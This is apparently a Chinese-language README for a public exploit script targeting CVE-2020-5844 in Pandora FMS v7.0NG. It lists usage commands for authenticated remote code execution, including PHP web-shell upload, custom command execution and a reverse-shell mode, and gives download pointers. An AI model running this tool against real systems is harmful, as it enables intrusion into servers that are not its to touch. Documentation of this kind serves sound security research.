
喜欢这个仓库?给我们一个 ⭐!
仅供教育和授权的安全研究使用。
@UNICORDev 由 (@NicPWNs 和 @Dev-Yeoj) 编写
Pandora FMS v7.0 NG 中的 index.php?sec=godmode/extensions&sec2=extensions/files_repo 允许经过身份验证的管理员上传恶意 PHP 脚本,并通过 base64 解码文件位置来执行这些脚本。这影响 v7.0NG.742_FIX_PERL2020。
使用此漏洞利用程序可在存在漏洞的 Pandora FMS 版本上执行远程代码。需要目标 IP 地址和端口。需要有效的用户名/密码或有效的 PHPSESSID cookie 身份验证。以默认模式运行可上传基本的 PHP Web shell。以自定义命令模式运行可在目标上执行自定义命令。以反向 Shell 模式运行可在您设置的监听器上接收来自目标的反向 Shell。以 Web Shell 自定义模式运行可更改 PHP Web shell 文件的名称。
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -u <username> <password>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID>
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-c <custom-command>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-s <local-ip> <local-port>]
python3 exploit-CVE-2020-5844.py -t <target-IP> <target-port> -p <PHPSESSID> [-w <name.php>]
python3 exploit-CVE-2020-5844.py -h
-t 目标主机和端口。提供目标 IP 地址和端口。
-u 目标用户名和密码。提供用于登录 Pandora FMS 的用户名和密码。
-p 目标有效的 PHP 会话 ID。不需要用户名或密码。(可选)
-s 反向 Shell 模式。提供本地 IP 地址和端口。(可选)
-c 自定义命令模式。提供要执行的命令。(可选)
-w Web Shell 自定义模式。提供自定义 PHP 文件名。(可选)
-h 显示此帮助菜单。
从 GitHub 下载 exploit-CVE-2020-5844.py
从 ExploitDB 下载 exploit-CVE-2020-5844.py
searchsploit -u
searchsploit -m 50961
Pandora FMS v7.0NG.742




